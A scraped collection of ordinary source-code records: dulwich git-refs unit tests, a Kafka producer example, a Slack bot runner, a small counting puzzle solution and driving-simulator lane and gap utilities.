self._refs.get_peeled(b\"refs/tags/refs-0.2\"))\n self.assertEqual(\n b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\",\n self._refs[b\"refs/tags/refs-0.2\"],\n )\n\n # packed, known not peelable\n self.assertEqual(\n self._refs[b\"refs/heads/packed\"],\n self._refs.get_peeled(b\"refs/heads/packed\"),\n )\n\n # packed, peeled\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs.get_peeled(b\"refs/tags/refs-0.1\"),\n )\n\n def test_setitem(self):\n RefsContainerTests.test_setitem(self)\n path = os.path.join(self._refs.path, b\"refs\", b\"some\", b\"ref\")\n with open(path, \"rb\") as f:\n self.assertEqual(b\"42d06bd4b77fed026b154d16493e5deab78f02ec\", f.read()[:40])\n\n self.assertRaises(\n OSError,\n self._refs.__setitem__,\n b\"refs/some/ref/sub\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n\n def test_delete_refs_container(self):\n # We shouldn't delete the refs directory\n self._refs[b'refs/heads/blah'] = b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"\n for ref in self._refs.allkeys():\n del self._refs[ref]\n self.assertTrue(os.path.exists(os.path.join(self._refs.path, b'refs')))\n\n def test_setitem_packed(self):\n with open(os.path.join(self._refs.path, b\"packed-refs\"), \"w\") as f:\n f.write(\"# pack-refs with: peeled fully-peeled sorted \\n\")\n f.write(\"42d06bd4b77fed026b154d16493e5deab78f02ec refs/heads/packed\\n\")\n\n # It's allowed to set a new ref on a packed ref, the new ref will be\n # placed outside on refs/\n self._refs[b\"refs/heads/packed\"] = b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\"\n packed_ref_path = os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"packed\")\n with open(packed_ref_path, \"rb\") as f:\n self.assertEqual(b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\", f.read()[:40])\n\n self.assertRaises(\n OSError,\n self._refs.__setitem__,\n b\"refs/heads/packed/sub\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n\n # this shouldn't overwrite the packed refs\n self.assertEqual(\n {b\"refs/heads/packed\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"},\n self._refs.get_packed_refs(),\n )\n\n def test_add_packed_refs(self):\n # first, create a non-packed ref\n self._refs[b\"refs/heads/packed\"] = b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\"\n\n packed_ref_path = os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"packed\")\n self.assertTrue(os.path.exists(packed_ref_path))\n\n # now overwrite that with a packed ref\n packed_refs_file_path = os.path.join(self._refs.path, b\"packed-refs\")\n self._refs.add_packed_refs(\n {\n b\"refs/heads/packed\": b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n }\n )\n\n # that should kill the file\n self.assertFalse(os.path.exists(packed_ref_path))\n\n # now delete the packed ref\n self._refs.add_packed_refs(\n {\n b\"refs/heads/packed\": None,\n }\n )\n\n # and it's gone!\n self.assertFalse(os.path.exists(packed_ref_path))\n\n self.assertRaises(\n KeyError,\n self._refs.__getitem__,\n b\"refs/heads/packed\",\n )\n\n # just in case, make sure we can't pack HEAD\n self.assertRaises(\n ValueError,\n self._refs.add_packed_refs,\n {b\"HEAD\": \"02ac81614bcdbd585a37b4b0edf8cb8a\"},\n )\n\n # delete all packed refs\n self._refs.add_packed_refs({ref: None for ref in self._refs.get_packed_refs()})\n\n self.assertEqual({}, self._refs.get_packed_refs())\n\n # remove the packed ref file, and check that adding nothing doesn't affect that\n os.remove(packed_refs_file_path)\n\n # adding nothing doesn't make it reappear\n self._refs.add_packed_refs({})\n\n self.assertFalse(os.path.exists(packed_refs_file_path))\n\n def test_setitem_symbolic(self):\n ones = b\"1\" * 40\n self._refs[b\"HEAD\"] = ones\n self.assertEqual(ones, self._refs[b\"HEAD\"])\n\n # ensure HEAD was not modified\n f = open(os.path.join(self._refs.path, b\"HEAD\"), \"rb\")\n v = next(iter(f)).rstrip(b\"\\n\\r\")\n f.close()\n self.assertEqual(b\"ref: refs/heads/master\", v)\n\n # ensure the symbolic link was written through\n f = open(os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"master\"), \"rb\")\n self.assertEqual(ones, f.read()[:40])\n f.close()\n\n def test_set_if_equals(self):\n RefsContainerTests.test_set_if_equals(self)\n\n # ensure symref was followed\n self.assertEqual(b\"9\" * 40, self._refs[b\"refs/heads/master\"])\n\n # ensure lockfile was deleted\n self.assertFalse(\n os.path.exists(\n os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"master.lock\")\n )\n )\n self.assertFalse(os.path.exists(os.path.join(self._refs.path, b\"HEAD.lock\")))\n\n def test_add_if_new_packed(self):\n # don't overwrite packed ref\n self.assertFalse(self._refs.add_if_new(b\"refs/tags/refs-0.1\", b\"9\" * 40))\n self.assertEqual(\n b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n self._refs[b\"refs/tags/refs-0.1\"],\n )\n\n def test_add_if_new_symbolic(self):\n # Use an empty repo instead of the default.\n repo_dir = os.path.join(tempfile.mkdtemp(), \"test\")\n os.makedirs(repo_dir)\n repo = Repo.init(repo_dir)\n self.addCleanup(tear_down_repo, repo)\n refs = repo.refs\n\n nines = b\"9\" * 40\n self.assertEqual(b\"ref: refs/heads/master\", refs.read_ref(b\"HEAD\"))\n self.assertNotIn(b\"refs/heads/master\", refs)\n self.assertTrue(refs.add_if_new(b\"HEAD\", nines))\n self.assertEqual(b\"ref: refs/heads/master\", refs.read_ref(b\"HEAD\"))\n self.assertEqual(nines, refs[b\"HEAD\"])\n self.assertEqual(nines, refs[b\"refs/heads/master\"])\n self.assertFalse(refs.add_if_new(b\"HEAD\", b\"1\" * 40))\n self.assertEqual(nines, refs[b\"HEAD\"])\n self.assertEqual(nines, refs[b\"refs/heads/master\"])\n\n def test_follow(self):\n self.assertEqual(\n (\n [b\"HEAD\", b\"refs/heads/master\"],\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n ),\n self._refs.follow(b\"HEAD\"),\n )\n self.assertEqual(\n (\n [b\"refs/heads/master\"],\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n ),\n self._refs.follow(b\"refs/heads/master\"),\n )\n self.assertRaises(SymrefLoop, self._refs.follow, b\"refs/heads/loop\")\n\n def test_set_overwrite_loop(self):\n self.assertRaises(SymrefLoop, self._refs.follow, b\"refs/heads/loop\")\n self._refs[b'refs/heads/loop'] = (\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\")\n self.assertEqual(\n ([b'refs/heads/loop'], b'42d06bd4b77fed026b154d16493e5deab78f02ec'),\n self._refs.follow(b\"refs/heads/loop\"))\n\n def test_delitem(self):\n RefsContainerTests.test_delitem(self)\n ref_file = os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"master\")\n self.assertFalse(os.path.exists(ref_file))\n self.assertNotIn(b\"refs/heads/master\", self._refs.get_packed_refs())\n\n def test_delitem_symbolic(self):\n self.assertEqual(b\"ref: refs/heads/master\", self._refs.read_loose_ref(b\"HEAD\"))\n del self._refs[b\"HEAD\"]\n self.assertRaises(KeyError, lambda: self._refs[b\"HEAD\"])\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs[b\"refs/heads/master\"],\n )\n self.assertFalse(os.path.exists(os.path.join(self._refs.path, b\"HEAD\")))\n\n def test_remove_if_equals_symref(self):\n # HEAD is a symref, so shouldn't equal its dereferenced value\n self.assertFalse(\n self._refs.remove_if_equals(\n b\"HEAD\", b\"42d06bd4b77fed026b154d16493e5deab78f02ec\"\n )\n )\n self.assertTrue(\n self._refs.remove_if_equals(\n b\"refs/heads/master\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n )\n self.assertRaises(KeyError, lambda: self._refs[b\"refs/heads/master\"])\n\n # HEAD is now a broken symref\n self.assertRaises(KeyError, lambda: self._refs[b\"HEAD\"])\n self.assertEqual(b\"ref: refs/heads/master\", self._refs.read_loose_ref(b\"HEAD\"))\n\n self.assertFalse(\n os.path.exists(\n os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"master.lock\")\n )\n )\n self.assertFalse(os.path.exists(os.path.join(self._refs.path, b\"HEAD.lock\")))\n\n def test_remove_packed_without_peeled(self):\n refs_file = os.path.join(self._repo.path, \"packed-refs\")\n f = GitFile(refs_file)\n refs_data = f.read()\n f.close()\n f = GitFile(refs_file, \"wb\")\n f.write(\n b\"\\n\".join(\n line\n for line in refs_data.split(b\"\\n\")\n if not line or line[0] not in b\"#^\"\n )\n )\n f.close()\n self._repo = Repo(self._repo.path)\n refs = self._repo.refs\n self.assertTrue(\n refs.remove_if_equals(\n b\"refs/heads/packed\",\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n )\n )\n\n def test_remove_if_equals_packed(self):\n # test removing ref that is only packed\n self.assertEqual(\n b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n self._refs[b\"refs/tags/refs-0.1\"],\n )\n self.assertTrue(\n self._refs.remove_if_equals(\n b\"refs/tags/refs-0.1\",\n b\"df6800012397fb85c56e7418dd4eb9405dee075c\",\n )\n )\n self.assertRaises(KeyError, lambda: self._refs[b\"refs/tags/refs-0.1\"])\n\n def test_remove_parent(self):\n self._refs[b\"refs/heads/foo/bar\"] = b\"df6800012397fb85c56e7418dd4eb9405dee075c\"\n del self._refs[b\"refs/heads/foo/bar\"]\n ref_file = os.path.join(\n self._refs.path,\n b\"refs\",\n b\"heads\",\n b\"foo\",\n b\"bar\",\n )\n self.assertFalse(os.path.exists(ref_file))\n ref_file = os.path.join(self._refs.path, b\"refs\", b\"heads\", b\"foo\")\n self.assertFalse(os.path.exists(ref_file))\n ref_file = os.path.join(self._refs.path, b\"refs\", b\"heads\")\n self.assertTrue(os.path.exists(ref_file))\n self._refs[b\"refs/heads/foo\"] = b\"df6800012397fb85c56e7418dd4eb9405dee075c\"\n\n def test_read_ref(self):\n self.assertEqual(b\"ref: refs/heads/master\", self._refs.read_ref(b\"HEAD\"))\n self.assertEqual(\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\",\n self._refs.read_ref(b\"refs/heads/packed\"),\n )\n self.assertEqual(None, self._refs.read_ref(b\"nonexistent\"))\n\n def test_read_loose_ref(self):\n self._refs[b\"refs/heads/foo\"] = b\"df6800012397fb85c56e7418dd4eb9405dee075c\"\n\n self.assertEqual(None, self._refs.read_ref(b\"refs/heads/foo/bar\"))\n\n def test_non_ascii(self):\n try:\n encoded_ref = os.fsencode(\"refs/tags/schön\")\n except UnicodeEncodeError as exc:\n raise SkipTest(\n \"filesystem encoding doesn't support special character\"\n ) from exc\n p = os.path.join(os.fsencode(self._repo.path), encoded_ref)\n with open(p, \"w\") as f:\n f.write(\"00\" * 20)\n\n expected_refs = dict(_TEST_REFS)\n expected_refs[encoded_ref] = b\"00\" * 20\n del expected_refs[b\"refs/heads/loop\"]\n\n self.assertEqual(expected_refs, self._repo.get_refs())\n\n def test_cyrillic(self):\n if sys.platform in (\"darwin\", \"win32\"):\n raise SkipTest(\"filesystem encoding doesn't support arbitrary bytes\")\n # reported in https://github.com/dulwich/dulwich/issues/608\n name = b\"\\xcd\\xee\\xe2\\xe0\\xff\\xe2\\xe5\\xf2\\xea\\xe01\"\n encoded_ref = b\"refs/heads/\" + name\n with open(os.path.join(os.fsencode(self._repo.path), encoded_ref), \"w\") as f:\n f.write(\"00\" * 20)\n\n expected_refs = set(_TEST_REFS.keys())\n expected_refs.add(encoded_ref)\n\n self.assertEqual(expected_refs, set(self._repo.refs.allkeys()))\n self.assertEqual(\n {r[len(b\"refs/\") :] for r in expected_refs if r.startswith(b\"refs/\")},\n set(self._repo.refs.subkeys(b\"refs/\")),\n )\n expected_refs.remove(b\"refs/heads/loop\")\n expected_refs.add(b\"HEAD\")\n self.assertEqual(expected_refs, set(self._repo.get_refs().keys()))\n\n\n_TEST_REFS_SERIALIZED = (\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\\t\"\n b\"refs/heads/40-char-ref-aaaaaaaaaaaaaaaaaa\\n\"\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\\trefs/heads/master\\n\"\n b\"42d06bd4b77fed026b154d16493e5deab78f02ec\\trefs/heads/packed\\n\"\n b\"df6800012397fb85c56e7418dd4eb9405dee075c\\trefs/tags/refs-0.1\\n\"\n b\"3ec9c43c84ff242e3ef4a9fc5bc111fd780a76a8\\trefs/tags/refs-0.2\\n\"\n)\n\n\nclass InfoRefsContainerTests(TestCase):\n def test_invalid_refname(self):\n text = _TEST_REFS_SERIALIZED + b\"00\" * 20 + b\"\\trefs/stash\\n\"\n refs = InfoRefsContainer(BytesIO(text))\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"HEAD\"]\n expected_refs[b\"refs/stash\"] = b\"00\" * 20\n del expected_refs[b\"refs/heads/loop\"]\n self.assertEqual(expected_refs, refs.as_dict())\n\n def test_keys(self):\n refs = InfoRefsContainer(BytesIO(_TEST_REFS_SERIALIZED))\n actual_keys = set(refs.keys())\n self.assertEqual(set(refs.allkeys()), actual_keys)\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"HEAD\"]\n del expected_refs[b\"refs/heads/loop\"]\n self.assertEqual(set(expected_refs.keys()), actual_keys)\n\n actual_keys = refs.keys(b\"refs/heads\")\n actual_keys.discard(b\"loop\")\n self.assertEqual(\n [b\"40-char-ref-aaaaaaaaaaaaaaaaaa\", b\"master\", b\"packed\"],\n sorted(actual_keys),\n )\n self.assertEqual([b\"refs-0.1\", b\"refs-0.2\"], sorted(refs.keys(b\"refs/tags\")))\n\n def test_as_dict(self):\n refs = InfoRefsContainer(BytesIO(_TEST_REFS_SERIALIZED))\n # refs/heads/loop does not show up even if it exists\n expected_refs = dict(_TEST_REFS)\n del expected_refs[b\"HEAD\"]\n del expected_refs[b\"refs/heads/loop\"]\n self.assertEqual(expected_refs, refs.as_dict())\n\n def test_contains(self):\n refs = InfoRefsContainer(BytesIO(_TEST_REFS_SERIALIZED))\n self.assertIn(b\"refs/heads/master\", refs)\n self.assertNotIn(b\"refs/heads/bar\", refs)\n\n def test_get_peeled(self):\n refs = InfoRefsContainer(BytesIO(_TEST_REFS_SERIALIZED))\n # refs/heads/loop does not show up even if it exists\n self.assertEqual(\n _TEST_REFS[b\"refs/heads/master\"],\n refs.get_peeled(b\"refs/heads/master\"),\n )\n\n\nclass ParseSymrefValueTests(TestCase):\n def test_valid(self):\n self.assertEqual(b\"refs/heads/foo\", parse_symref_value(b\"ref: refs/heads/foo\"))\n\n def test_invalid(self):\n self.assertRaises(ValueError, parse_symref_value, b\"foobar\")\n\n\nclass StripPeeledRefsTests(TestCase):\n\n all_refs = {\n b\"refs/heads/master\": b\"8843d7f92416211de9ebb963ff4ce28125932878\",\n b\"refs/heads/testing\": b\"186a005b134d8639a58b6731c7c1ea821a6eedba\",\n b\"refs/tags/1.0.0\": b\"a93db4b0360cc635a2b93675010bac8d101f73f0\",\n b\"refs/tags/1.0.0^{}\": b\"a93db4b0360cc635a2b93675010bac8d101f73f0\",\n b\"refs/tags/2.0.0\": b\"0749936d0956c661ac8f8d3483774509c165f89e\",\n b\"refs/tags/2.0.0^{}\": b\"0749936d0956c661ac8f8d3483774509c165f89e\",\n }\n non_peeled_refs = {\n b\"refs/heads/master\": b\"8843d7f92416211de9ebb963ff4ce28125932878\",\n b\"refs/heads/testing\": b\"186a005b134d8639a58b6731c7c1ea821a6eedba\",\n b\"refs/tags/1.0.0\": b\"a93db4b0360cc635a2b93675010bac8d101f73f0\",\n b\"refs/tags/2.0.0\": b\"0749936d0956c661ac8f8d3483774509c165f89e\",\n }\n\n def test_strip_peeled_refs(self):\n # Simple check of two dicts\n self.assertEqual(strip_peeled_refs(self.all_refs), self.non_peeled_refs)\n","repo_name":"jelmer/dulwich","sub_path":"dulwich/tests/test_refs.py","file_name":"test_refs.py","file_ext":"py","file_size_in_byte":29254,"program_lang":"python","lang":"en","doc_type":"code","stars":1962,"dataset":"github-code","pt":"68"} +{"seq_id":"27776557109","text":"from kafka import KafkaProducer \nfrom json import dumps \n\n\nproducer=KafkaProducer(acks=0, #메시지 받은 사람이 메시지를 잘 받았는지 체크하는 옵션 (0은 그냥 보내기만 한다. 확인x)\n compression_type='gzip', #메시지 전달할 때 압축\n bootstrap_servers=['localhost:9092'], #전달하고자하는 카프카 브로커의 위치\n value_serializer=lambda x: dumps(x).encode('utf-8') #직렬화 : 데이터 전송을 위해 byte단위로 바꿔주는 작업 : \n #dumps 함수이용. dump : json 값을 메모리에 올려준다. encode를 통해서 올린다.\n #x가 있으면, x를 dumps로 바꾸고 encode 한다.\n )\n\nfor i in range(10): #10개의 값을 \n data={'name':'Dowon-'+str(i)}\n producer.send('test-2021-09-05',value=data)\n producer.flush() # 비우는 작업.\n\nprint(\"DONE\")\n","repo_name":"jenny5587/Kafka","sub_path":"kafka/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38988625058","text":"# -*- coding: utf-8 -*-\n# @Author: Tasdik Rahman \n# @http://tasdikrahman.me\n\n\"\"\"\nStiches everything together to make Bumblebee work\n\"\"\"\n\nimport time\n\nfrom slackclient import SlackClient\n\nfrom bumblebee.constants import SLACK_TOKEN, READ_WEBSOCKET_DELAY\nfrom bumblebee.exceptions import SlackClientErorr\nfrom bumblebee.helpers.general_helpers import parse_slack_output, handle_command\n\n\n# instantiate Slack client\ntry:\n slack_client = SlackClient(SLACK_TOKEN)\nexcept Exception:\n raise SlackClientErorr(\"Invalid SLACK API TOKEN\")\n\n\ndef runner():\n if slack_client.rtm_connect():\n print(\"StarterBot connected and running!\")\n while True:\n command, channel = parse_slack_output(slack_client.rtm_read())\n if command and channel:\n handle_command(slack_client, command, channel)\n time.sleep(READ_WEBSOCKET_DELAY)\n else:\n print(\"Connection failed. Invalid Slack token or bot ID?\")\n","repo_name":"wingify/bumblebee","sub_path":"bumblebee/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"33171424791","text":"import sys\n\nn = int(sys.stdin.readline())\n\nk = 1\ncount = 0\nsum = 0\nwhile True:\n if sum == n:\n break\n if sum + k > n:\n k = 1\n sum += k\n else:\n sum += k\n k += 1\n count += 1\n\nprint(count)","repo_name":"parkmingue00/AlgoPractice","sub_path":"Python/1568_새.py","file_name":"1568_새.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10253700674","text":"#!/usr/bin/env python3\n#rqueiroz@uwaterloo.ca\n#d43sharm@uwaterloo.ca\n# ---------------------------------------------\n# Util functions for decision-making in the frenet frame.\n# --------------------------------------------\n\n\nfrom sv.ManeuverConfig import *\nfrom SimConfig import *\nimport numpy as np\nfrom Actor import *\nimport glog as log\nfrom sv.SDVTrafficState import TrafficState\n\n\n\ndef lane_swerve_completed(vehicle_state, lane_config:LaneConfig, mconfig:MLaneSwerveConfig):\n current_lane = None\n if mconfig.target_lid == 1: # left\n # check if right border of vehicle has crossed right border of lane\n current_lane = lane_config.get_current_lane(vehicle_state.d - VEHICLE_RADIUS)\n elif mconfig.target_lid == -1: # right\n current_lane = lane_config.get_current_lane(vehicle_state.d + VEHICLE_RADIUS)\n else: # target_lid is None or 0\n log.warn(\"WARNING: Lane swerve completed into target_lid {}\".format(mconfig.target_lid))\n current_lane = lane_config\n\n return current_lane.id == mconfig.target_lid\n\ndef cutin_completed(vehicle_state, lane_config:LaneConfig, mconfig:MCutInConfig, traffic_vehicles):\n target_lane_config = lane_config.get_current_lane(traffic_vehicles[mconfig.target_vid].state.d)\n if not target_lane_config:\n log.warn(\"Target vehicle {} is not in an adjacent lane\".format(mconfig.target_vid))\n return None, None\n\n # To start logging when in other lane (for experiments)\n if lane_swerve_completed(vehicle_state, lane_config, MLaneSwerveConfig(target_lid=target_lane_config.id)):\n state_str = (\n \"Cutter:\\n\"\n \" position s={:.3f} sim=({:.3f},{:.3f})\\n\"\n \" speed {:.3f}\\n\"\n ).format(\n vehicle_state.s,\n vehicle_state.x, vehicle_state.y,\n vehicle_state.s_vel\n )\n for vid, tvehicle in traffic_vehicles.items():\n state_str += (\n \"VID {}:\\n\"\n \" position {:.3f}\\n\"\n \" speed {:.3f}\\n\"\n \" delta dist {:.3f}\\n\"\n \" delta vel {:.3f}\\n\"\n ).format(\n vid,\n tvehicle.state.s,\n tvehicle.state.s_vel,\n vehicle_state.s - tvehicle.state.s - 2*VEHICLE_RADIUS,\n vehicle_state.s_vel - tvehicle.state.s_vel\n )\n log.info(state_str)\n log.warn(\"WARNING: Lane swerve completed into target_lid {}\".format(mconfig.target_lid))\n return True\n\n # return lane_swerve_completed(vehicle_state, lane_config, MLaneSwerveConfig(target_lid=target_lane_config.id))\n # Returning false for the experiments\n return False\n # NOTE: this error checking doesn't work cause the goal_state like I defined is wrong, it should be\n # vehicle.future_state(t) where t was used to generate its trajectory. but we don't know\n # what t was used in the planning step here.\n # measure diff in target s and s_vel\n # target_vehicle_state = traffic_vehicles[mconfig.target_vid].vehicle_state\n # delta = np.array([mconfig.delta_s[0], mconfig.delta_d[0], mconfig.delta_s[1]])\n # goal_state = np.array([target_vehicle_state.s, target_vehicle_state.d, target_vehicle_state.s_vel]) + delta\n # cur_state = np.array([\n # vehicle_state.s,\n # vehicle_state.d,\n # vehicle_state.s_vel\n # ])\n\n # log.info(\"target: \" + str(goal_state))\n # log.info(\"cur: \" + str(cur_state))\n # log.info(\"target delta {}\".format(cur_state - goal_state))\n # just try ending on delta d diff and some vel o\n # err_vector = (cur_state - goal_state) / goal_state\n # print(\"err: \" + str(err_vector))\n # return abs(err_vector[1]) < 0.1 and abs(err_vector[0]) < 0.1 and abs(err_vector[2]) < 0.1\n\n\ndef lane_swerve_or_cutin_completed(vehicle_state, lane_config:LaneConfig, mconfig:MConfig, traffic_vehicles):\n if type(mconfig) == MLaneSwerveConfig:\n return lane_swerve_completed(vehicle_state, lane_config, mconfig)\n elif type(mconfig) == MCutInConfig:\n return cutin_completed(vehicle_state, lane_config, mconfig, traffic_vehicles)\n return False\n\ndef can_perform_lane_change():\n return True\n\n# no way of knowing if passed goal\n# def has_reached_goal(vehicle_state, goal_point, threshold=2):\n# to_goal = np.array(goal_point) - np.array([vehicle_state.x, vehicle_state.y])\n# sqr_distance = np.dot(to_goal, to_goal)\n# return sqr_distance < threshold*threshold\n\n#def has_reached_goal_frenet(vehicle_state, goal_point, threshold=2):\n# return False if not goal_point else goal_point[0] - vehicle_state.s < threshold\n\ndef has_reached_goal_frenet(vehicle_state, frenet_goal_point, route_complete, threshold=20, reverse=False):\n \"\"\" Checks if the vehicle has reached or passed the goal point in the frenet frame.\n @param frenet_goal_point: Arraylike (s,d) goal position in the vehicle's frenet frame\n \"\"\"\n if frenet_goal_point is None:\n return False\n\n # TODO: remove reverse from goal condition; all vehicles' goals will be the\n # last point in their route\n # goal_s = 0 if reverse else frenet_goal_point[0]\n # direction = -1 if reverse else 1\n goal_s = frenet_goal_point[0]\n\n # A distance to goal with the same sign as direction means we've reached and passed it\n # return direction * (goal_s - vehicle_state.s) < threshold\n # The vehicle has completed its route and has reached or passed its goal\n return route_complete and (goal_s - vehicle_state.s < threshold)\n\ndef is_in_following_range(self_id, vehicle_state, other_vehicles, lane_config:LaneConfig, time_gap=5, distance_gap=30):\n \"\"\" Determines whether there is a vehicle in front of a given vehicle in the same lane and within a specified\n time or distance gap.\n @param time_gap: The time gap below which a vehicle is considered to be following a leading vehicle.\n @param distance_gap: The distance at which a vehicle is considered to be following a leading vehicle,\n regardless of the time gap to the leading vehicle. This should be around the stopping\n distance of SVs.\n \"\"\"\n log.check_notnone(lane_config)\n\n is_following = False\n leading_vid = None\n\n leading_vehicle = get_leading_vehicle(vehicle_state, lane_config, other_vehicles)\n\n if leading_vehicle is not None:\n dist = leading_vehicle.state.s - VEHICLE_RADIUS - vehicle_state.s - VEHICLE_RADIUS\n if dist < 0:\n log.error(\"distance to leading vehicle zero!\")\n\n time_to_leader = dist / vehicle_state.s_vel if vehicle_state.s_vel != 0 else float('inf')\n\n # Enter following range if below threshold for distance gap or time gap.\n if (dist < distance_gap) or (0 <= time_to_leader < time_gap):\n is_following = True\n leading_vid = leading_vehicle.id\n #log.info(\"{} is leading. Distance {}, time gap {}\".format(\n # leading_vehicle.id, dist, time_to_leader))\n\n return is_following, leading_vid\n\ndef is_lane_occupied(vehicle_state, lane_config, traffic_vehicles, threshold=50):\n log.check_notnone(lane_config)\n\n smin = vehicle_state.s - threshold\n smax = vehicle_state.s + threshold\n vehicles_in_lane = list(filter(\n lambda v: smin < v.state.s < smax,\n get_vehicles_in_lane(lane_config, traffic_vehicles)\n ))\n\n return len(vehicles_in_lane) != 0\n\ndef get_vehicles_in_lane(lane_config, traffic_vehicles):\n log.check_notnone(lane_config)\n\n vehicles = []\n for vid, traffic_vehicle in traffic_vehicles.items():\n other_vehicle_lane = lane_config.get_current_lane(traffic_vehicle.state.d)\n if other_vehicle_lane and other_vehicle_lane.id == lane_config.id:\n vehicles.append(traffic_vehicle)\n return vehicles\n\n# same as below, but i didn't wanna touch Ricardo's code. TODO clean this up\ndef get_leading_vehicle(vehicle_state, lane_config, traffic_vehicles):\n \"\"\" Gets closest vehicle in the same lane as vehicle_state.\n \"\"\"\n log.check_notnone(lane_config)\n\n cur_lane = lane_config.get_current_lane(vehicle_state.d)\n #if cur_lane is None:\n #print(vehicle_state.d)\n #print(lane_config)\n log.check_notnone(cur_lane)\n\n vehicles_ahead = list(filter(\n lambda v: v.state.s > vehicle_state.s,\n get_vehicles_in_lane(cur_lane, traffic_vehicles)\n ))\n\n if len(vehicles_ahead) == 0:\n return None\n\n return min(vehicles_ahead, key=lambda v: v.state.s)\n\ndef get_closest_vehicle_in_lane(vehicle_state, lane_config, traffic_vehicles):\n vehicles_in_lane = get_vehicles_in_lane(lane_config, traffic_vehicles)\n if len(vehicles_in_lane) == 0:\n return None\n return min(vehicles_in_lane, key=lambda v: abs(v.state.s - v.state.s))\n\ndef reached_gap(vehicle_state, target_lane_config, traffic_vehicles, meters):\n \"\"\" determines whether `vehicle_state` is `meters` ahead of the\n nearest vehicle in the target lane.\n \"\"\"\n target_vehicle = get_closest_vehicle_in_lane(vehicle_state, target_lane_config, traffic_vehicles)\n if target_vehicle is None:\n log.warn(\"No target vehicle in {} lane.\".format('LEFT' if target_lane_config.id == 1 else 'RIGHT'))\n return True\n gap = range_gap(vehicle_state,target_vehicle)\n #print(\"GAP\" + str(gap))\n return gap > meters\n\n#def ttc(self_id, vehicle_state, other_vehicles, lane_config:LaneConfig):\n\ndef range_gap(vehicle_state, target_vehicle):\n \"\"\"Longitudinal distance between vehicles (front bumper to back bumper) if same or paralell lanes.\n If behind target, gap is negative. If ahead, gap is positive.\n Gap is zero if there is no distance between vehicle limits.\n \"\"\"\n #gap = vehicle_state.s - VEHICLE_RADIUS - (target_vehicle.state.s + VEHICLE_RADIUS)\n half_length = VEHICLE_LENGTH /2\n #ahead, positive or zero\n if vehicle_state.s > target_vehicle.state.s:\n #back bump - target front bump\n range = max((vehicle_state.s - half_length) - (target_vehicle.state.s + half_length), 0)\n #behind, negative or zero \n else:\n #front bump - target back bump\n range = min((vehicle_state.s + half_length) - (target_vehicle.state.s - half_length), 0)\n return range\n\n#Ricardo's implementation:\n\ndef get_vehicle_ahead(vehicle_state, lane_config, vehicles, threshold=4):\n ''' Analyzes (frenet coordinates) whether is there an adversary vehicle\n (adversary_vehicle) ahead of subject vehicle (subject_vehicle)\n sharing the same lane, within a threshold (frenet s-plane). In case\n of multiple vehicles, it returns the closest one.\n @return (vid, sv.SV.Vehicle)'''\n\n subject_vehicle_state = vehicle_state\n s_current_lane = lane_config.get_current_lane(subject_vehicle_state.d)\n dist = float('inf')\n nearest = list()\n for vid, adversary_vehicle in vehicles.items():\n a_current_lane = lane_config.get_current_lane(adversary_vehicle.state.d)\n\n #if they are both in the same lane\n if s_current_lane == a_current_lane:\n # and the adv is ahead of the subj (within the thresh)\n if subject_vehicle_state.s < adversary_vehicle.state.s and adversary_vehicle.state.s < subject_vehicle_state.s + threshold:\n diff = adversary_vehicle.state.s - subject_vehicle_state.s\n if diff < dist:\n dist = diff\n nearest = [vid,adversary_vehicle]\n\n return nearest\n\ndef is_stopped(traffic_vehicle):\n return abs(traffic_vehicle.state.s_vel) < 0.05\n\ndef is_slow_vehicle(subject_vehicle, traffic_vehicle):\n return subject_vehicle.s_vel > traffic_vehicle.state.s_vel\n\ndef reached_acceptance_gap(vehicle_state, lane_config, vehicles, threshold=1):\n ''' Analyzes (frenet coordinates) whether is there an adversary vehicle\n (adversary_vehicle) ahead of subject vehicle (subject_vehicle)\n sharing the same lane, within a threshold (frenet s-plane). In case\n of multiple vehicles, it returns the closest one.\n @return (vid, sv.SV.Vehicle)'''\n\n subject_vehicle_state = vehicle_state\n s_current_lane = lane_config.get_current_lane(subject_vehicle_state.d)\n reached = True\n for vid, adversary_vehicle in vehicles.items():\n adversary_vehicle_state = adversary_vehicle.state\n\n a_current_lane = lane_config.get_current_lane(adversary_vehicle_state.d)\n if (a_current_lane is None or a_current_lane.id - 1 != s_current_lane): continue #makes sure not to compare with irrelevant vehicles (-1 is hardcoded)\n\n if subject_vehicle_state.s - VEHICLE_RADIUS < adversary_vehicle_state.s + VEHICLE_RADIUS + threshold:\n reached = False\n\n return 